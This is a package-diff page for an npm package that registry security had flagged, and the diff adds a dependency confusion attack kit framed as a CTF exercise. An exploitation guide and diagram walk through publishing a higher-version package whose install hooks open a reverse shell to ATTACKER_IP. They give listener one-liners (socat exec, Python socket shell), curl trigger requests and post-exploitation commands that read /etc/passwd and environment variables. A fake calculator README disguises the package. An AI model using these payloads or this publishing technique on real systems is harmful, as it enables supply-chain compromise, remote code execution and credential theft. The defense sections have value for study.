npm - node-calculator-x7k9 - Versions diffs - 0.0.1-security → 3.4.0 - Mend

node-calculator-x7k9 0.0.1-security → 3.4.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of node-calculator-x7k9 might be problematic. Click here for more details.

Files changed (13) hide show

package/ATTACK_DIAGRAM.txt ADDED Viewed

@@ -0,0 +1,237 @@
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                    DEPENDENCY CONFUSION ATTACK DIAGRAM                       ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+                          ┌─────────────────────┐
+                          │   ATTACKER MACHINE  │
+                          │  (Your Computer)    │
+                          └──────────┬──────────┘
+                                     │
+                          ┌──────────▼──────────┐
+                          │  1. Create Malicious│
+                          │     Package v3.0.0  │
+                          │  - preinstall.js    │
+                          │  - postinstall.js   │
+                          │  - Reverse shell    │
+                          └──────────┬──────────┘
+                                     │
+                          ┌──────────▼──────────┐
+                          │  2. Start Listener  │
+                          │  python3 listener.py│
+                          │  Port: 4444         │
+                          └──────────┬──────────┘
+                                     │
+                          ┌──────────▼──────────┐
+                          │  3. Publish to npm  │
+                          │  node-calculator-   │
+                          │  x7k9@3.0.0         │
+                          └──────────┬──────────┘
+                                     │
+                                     │ ████████████████████
+                                     │ ║  npm Registry   ║
+                                     │ ║  (Public)       ║
+                                     │ ████████████████████
+                                     │          │
+                                     │          │
+┌────────────────────────────────────┼──────────▼──────────────────────┐
+│                                    │                                  │
+│  ┌────────────────────────┐        │        ┌──────────────────────┐ │
+│  │   TARGET APPLICATION   │        │        │   npm pulls package  │ │
+│  │   (Victim Server)      │        │        │   v3.0.0 (higher!)   │ │
+│  │                        │        │        └──────────┬───────────┘ │
+│  │  node-calculator-x7k9  │        │                   │             │
+│  │  Current: v2.1.0       │        │        ┌──────────▼───────────┐ │
+│  └────────────┬───────────┘        │        │  npm installs        │ │
+│               │                    │        │  malicious package   │ │
+│  ┌────────────▼───────────┐        │        └──────────┬───────────┘ │
+│  │  4. Trigger Endpoint   │◄───────┘                   │             │
+│  │  POST /report-bug      │                 ┌──────────▼───────────┐ │
+│  └────────────┬───────────┘                 │  preinstall.js       │ │
+│               │                             │  executes!           │ │
+│  ┌────────────▼───────────┐                 │  - Reverse shell     │ │
+│  │  npm run report        │                 │  - Connects to       │ │
+│  │  = npm update --force  │                 │    ATTACKER_IP:4444  │ │
+│  └────────────┬───────────┘                 └──────────┬───────────┘ │
+│               │                                        │             │
+│               └────────────────────────────────────────┘             │
+│                                                                      │
+└──────────────────────────────────┬───────────────────────────────────┘
+                                   │
+                                   │ Connection!
+                                   │
+                        ┌──────────▼──────────┐
+                        │  5. Shell Received! │
+                        │  Attacker Listener  │
+                        │                     │
+                        │  $ id               │
+                        │  uid=1001(nodejs)   │
+                        │                     │
+                        │  $ cat /flag.txt    │
+                        │  FLAG{pwned!}       │
+                        └─────────────────────┘
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                              ATTACK TIMELINE                                 ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+ T-0:00  │ Attacker configures payload (ATTACKER_IP, ATTACKER_PORT)
+         │
+ T+0:01  │ Attacker starts listener on port 4444
+         │
+ T+0:02  │ Attacker publishes malicious package (v3.0.0) to npm
+         │
+         ├─────────────────────────────────────────────────────────────────
+         │
+ T+0:03  │ Attacker triggers /report-bug endpoint on target
+         │
+ T+0:04  │ Target executes: npm run report → npm update --force
+         │
+ T+0:05  │ npm queries registry for node-calculator-x7k9
+         │ └─ Finds v3.0.0 (higher than current v2.1.0)
+         │
+ T+0:06  │ npm downloads and installs v3.0.0
+         │ └─ Runs preinstall script (reverse shell payload)
+         │
+ T+0:07  │ Reverse shell executes
+         │ └─ Connects to ATTACKER_IP:4444
+         │
+ T+0:08  │ ✓ ATTACKER RECEIVES SHELL!
+         │ └─ Full control of target system
+         │
+         ├─────────────────────────────────────────────────────────────────
+         │
+ T+0:09  │ Attacker searches for flag: find / -name "*flag*" 2>/dev/null
+         │
+ T+0:10  │ Attacker reads flag: cat /flag.txt
+         │
+ T+0:11  │ ✓ FLAG CAPTURED! CTF COMPLETE!
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                            KEY VULNERABILITY                                 ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+┌────────────────────────────────────────────────────────────────────────────┐
+│  app.js (Lines 40-45)                                                      │
+│  ─────────────────────                                                     │
+│                                                                            │
+│  app.post('/report-bug', (req, res) => {                                  │
+│      const { message } = req.body;                                        │
+│      exec("npm run report", { cwd: __dirname }, (error, stdout, stderr)  │
+│  │       => {                                                             │
+│  │           res.json({ status: 'success', message: 'Bug reported' });   │
+│  │       });                                                              │
+│      });                                                                   │
+│                                                                            │
+│  package.json (Line 8)                                                     │
+│  ──────────────────────                                                   │
+│                                                                            │
+│  "scripts": {                                                              │
+│      "report": "npm update --force || true"  ← VULNERABLE!                │
+│  }                                                                         │
+│                                                                            │
+│  Why it's vulnerable:                                                      │
+│  • npm update checks public registry for newer versions                   │
+│  • No registry pinning (.npmrc)                                           │
+│  • No package-lock.json integrity check                                   │
+│  • --force flag bypasses safety checks                                    │
+│  • Runs as the 'nodejs' user (uid=1001)                                   │
+│  • preinstall/postinstall hooks execute arbitrary code                    │
+└────────────────────────────────────────────────────────────────────────────┘
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                           PAYLOAD MECHANISM                                  ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+  ┌────────────────────────────────────────────────────────────────────┐
+  │  package.json                                                      │
+  │  {                                                                 │
+  │    "name": "node-calculator-x7k9",                                 │
+  │    "version": "3.0.0",  ← HIGHER than victim's 2.1.0              │
+  │    "scripts": {                                                    │
+  │      "preinstall": "node preinstall.js",  ← Executes BEFORE       │
+  │      "postinstall": "node postinstall.js" ← Executes AFTER        │
+  │    }                                                               │
+  │  }                                                                 │
+  └────────────────────────┬───────────────────────────────────────────┘
+                           │
+          ┌────────────────┴───────────────────┐
+          │                                    │
+  ┌───────▼──────────┐              ┌─────────▼─────────┐
+  │  preinstall.js   │              │  postinstall.js   │
+  │  ──────────────  │              │  ───────────────  │
+  │                  │              │                   │
+  │  1. Reverse Shell│              │  1. Backup Shell  │
+  │     via net.Socket              │     Connection    │
+  │                  │              │                   │
+  │  2. Fallback:    │              │  2. Persistence   │
+  │     • nc -e      │              │     Mechanisms    │
+  │     • bash -i    │              │                   │
+  │     • python3    │              │  3. Log to        │
+  │                  │              │     /tmp/exfil.log│
+  │  3. Exfiltration │              │                   │
+  │     • System info│              │  4. Silent fail   │
+  │     • Env vars   │              │     if error      │
+  │     • Hostname   │              │                   │
+  │                  │              │                   │
+  │  4. Silent fail  │              │                   │
+  └──────────────────┘              └───────────────────┘
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                          DEFENSE MECHANISMS                                  ║
+║                    (How to Prevent This Attack)                              ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+  ✓ Use .npmrc with registry pinning
+    ────────────────────────────────
+    @company:registry=https://private-registry.com
+    //private-registry.com/:_authToken=${NPM_TOKEN}
+  ✓ Enable package-lock.json and use npm ci
+    ────────────────────────────────────────
+    npm ci  # Installs exact versions from lock file
+  ✓ Scope your private packages
+    ─────────────────────────────
+    @yourcompany/calculator  # Can't be hijacked on public registry
+  ✓ Use npm audit and integrity checks
+    ───────────────────────────────────
+    npm audit
+    npm audit signatures
+  ✓ Implement package verification
+    ──────────────────────────────
+    - Code signing
+    - Checksum verification
+    - Allow-lists
+  ✓ Use private registry with authentication
+    ────────────────────────────────────────
+    - Verdaccio
+    - npm Enterprise
+    - Azure Artifacts
+    - GitHub Packages
+╔══════════════════════════════════════════════════════════════════════════════╗
+║                                 RESOURCES                                    ║
+╚══════════════════════════════════════════════════════════════════════════════╝
+  📖 Detailed Guide ──► EXPLOITATION_GUIDE.md
+  🚀 Quick Reference ─► QUICK_REFERENCE.md
+  📋 Full Summary ────► EXPLOITATION_SUMMARY.md
+  🐍 Listener ────────► listener.py
+  💻 Windows Exploit ─► exploit.ps1
+  🐧 Linux Exploit ───► exploit.sh
+  🧪 Local Testing ───► test-local.ps1
+╔══════════════════════════════════════════════════════════════════════════════╗
+║  ⚠️  FOR CTF / EDUCATIONAL USE ONLY - UNAUTHORIZED ACCESS IS ILLEGAL  ⚠️    ║
+╚══════════════════════════════════════════════════════════════════════════════╝

package/EXPLOITATION_GUIDE.md ADDED Viewed

@@ -0,0 +1,236 @@
+# Dependency Confusion Attack - Exploitation Guide
+## Overview
+This is a **dependency confusion vulnerability** where the target application uses a private npm package (`node-calculator-x7k9`). By publishing a malicious package with the same name and higher version to the public npm registry, we can execute arbitrary code when the target runs `npm update`.
+## Attack Flow
+```
+1. Target uses node-calculator-x7k9@2.1.0 (private package)
+2. Attacker publishes node-calculator-x7k9@3.0.0 (malicious, public)
+3. Target triggers /report-bug endpoint
+4. npm update --force runs
+5. npm finds higher version (3.0.0) on public registry
+6. npm installs malicious package
+7. preinstall/postinstall hooks execute
+8. Reverse shell connects back to attacker
+```
+## Prerequisites
+1. **Your Attack Machine IP**: You need to know your public/accessible IP
+2. **npm Account**: Required to publish packages to npm registry
+3. **Network Access**: Target must be able to connect to your listener
+## Step-by-Step Exploitation
+### Step 1: Set Up Your Listener
+On your attack machine:
+```bash
+# Option 1: Using netcat
+nc -nlvp 4444
+# Option 2: Using ncat (better for CTF)
+ncat -nlvp 4444
+# Option 3: Using socat (most stable)
+socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
+# Option 4: Using Python
+python3 -c 'import socket,subprocess;s=socket.socket();s.bind(("0.0.0.0",4444));s.listen(1);c,a=s.accept();subprocess.call(["/bin/sh"],stdin=c,stdout=c,stderr=c)'
+```
+### Step 2: Configure the Payload
+Edit `preinstall.js` and `postinstall.js`:
+```javascript
+const ATTACKER_IP = 'YOUR_IP_HERE';    // Replace with your IP
+const ATTACKER_PORT = 4444;             // Replace with your port
+```
+**Getting Your IP:**
+```bash
+# Public IP
+curl ifconfig.me
+# Local network IP (for local CTF)
+ip addr show  # Linux
+ipconfig      # Windows
+```
+### Step 3: Publish the Malicious Package
+```bash
+cd malicious-package
+# Login to npm (if not already logged in)
+npm login
+# Publish the package
+npm publish
+# If package name is already taken, you might need to use a scope
+# npm publish --access public
+```
+**Important Notes:**
+- Your package version (3.0.0) MUST be higher than the target's version (2.1.0)
+- The package name MUST match exactly: `node-calculator-x7k9`
+- In real CTF environments, they might have a mock npm registry
+### Step 4: Alternative Publishing Methods
+#### Option A: Use Verdaccio (Local npm Registry)
+If the CTF uses a local npm registry:
+```bash
+# Install Verdaccio
+npm install -g verdaccio
+# Run Verdaccio
+verdaccio
+# Configure npm to use local registry
+npm set registry http://localhost:4873/
+# Publish
+npm publish
+```
+#### Option B: Direct Package Installation (Testing)
+For testing locally:
+```bash
+# In the target directory
+npm install /path/to/malicious-package
+# Or pack and install
+cd malicious-package
+npm pack
+cd ../just-a-calculator
+npm install ../malicious-package/node-calculator-x7k9-3.0.0.tgz
+```
+### Step 5: Trigger the Vulnerability
+Once published, trigger the bug report endpoint:
+```bash
+# Using curl
+curl -X POST http://TARGET_IP:3000/report-bug \
+  -H "Content-Type: application/json" \
+  -d '{"message": "test bug report"}'
+# Using Python
+python3 -c "import requests; requests.post('http://TARGET_IP:3000/report-bug', json={'message': 'test'})"
+```
+### Step 6: Catch the Shell
+Your listener should receive a connection:
+```bash
+$ nc -nlvp 4444
+Listening on 0.0.0.0 4444
+Connection received on TARGET_IP 54321
+=== Reverse Shell Connected ===
+Hostname: target-container
+User: nodejs
+CWD: /app
+================================
+$ id
+uid=1001(nodejs) gid=1001(nodejs) groups=1001(nodejs)
+$ ls
+app.js  node_modules  package.json  public
+$ cat /flag.txt
+FLAG{dependency_confusion_pwned_12345}
+```
+## Post-Exploitation
+Once you have a shell:
+```bash
+# Stabilize the shell
+python3 -c 'import pty; pty.spawn("/bin/bash")'
+# Press Ctrl+Z
+stty raw -echo; fg
+export TERM=xterm
+# Find the flag
+find / -name "*flag*" 2>/dev/null
+cat /flag.txt
+# Exfiltrate data
+cat /etc/passwd
+env
+ps aux
+# Check for other containers
+ip addr
+netstat -ant
+```
+## Troubleshooting
+### Shell Not Connecting?
+1. **Check firewall**: Make sure port 4444 is open
+   ```bash
+   sudo ufw allow 4444
+   # or
+   sudo iptables -I INPUT -p tcp --dport 4444 -j ACCEPT
+   ```
+2. **Check if package installed**: Look at the /report-bug response
+   ```bash
+   curl -X POST http://TARGET:3000/report-bug -H "Content-Type: application/json" -d '{"message":"test"}' -v
+   ```
+3. **Check logs**: The payload logs to `/tmp/exfil.log`
+4. **Try different payload**: The preinstall.js has multiple fallback methods
+### Package Not Installing?
+1. **Version not higher**: Make sure your version (3.0.0) > target version (2.1.0)
+2. **Registry misconfigured**: Check if target uses private registry
+3. **Package name mismatch**: Must be exactly `node-calculator-x7k9`
+## Defense Against This Attack
+For educational purposes, here's how to prevent this:
+1. **Use .npmrc with registry lockdown**:
+   ```
+   @yourcompany:registry=https://your-private-registry.com
+   ```
+2. **Use package-lock.json**: Prevents version changes
+3. **Use npm audit**: Detects suspicious packages
+4. **Implement integrity checks**: Use `npm ci` instead of `npm install`
+5. **Private registry with authentication**: Use Verdaccio, Artifactory, or npm Enterprise
+## Legal Notice
+⚠️ **This is for CTF/educational purposes only!**
+Unauthorized access to computer systems is illegal. Only use these techniques:
+- In authorized CTF competitions
+- In your own testing environments
+- With explicit written permission
+## Credits
+Attack technique: Dependency Confusion (Alex Birsan, 2021)
+https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

package/README.md CHANGED Viewed

@@ -1,5 +1,32 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=node-calculator-x7k9 for more information.
+# node-calculator-x7k9
+Simple calculator plugin with enhanced mathematical operations.
+## Installation
+```bash
+npm install node-calculator-x7k9
+```
+## Usage
+```javascript
+const calculator = require('node-calculator-x7k9');
+const result = calculator.calculate('add', 5, 3);
+console.log(result); // 8
+```
+## Supported Operations
+- `add` - Addition
+- `subtract` - Subtraction
+- `multiply` - Multiplication
+- `divide` - Division
+## Version 3.0.0
+- Enhanced performance
+- Bug fixes
+- Security improvements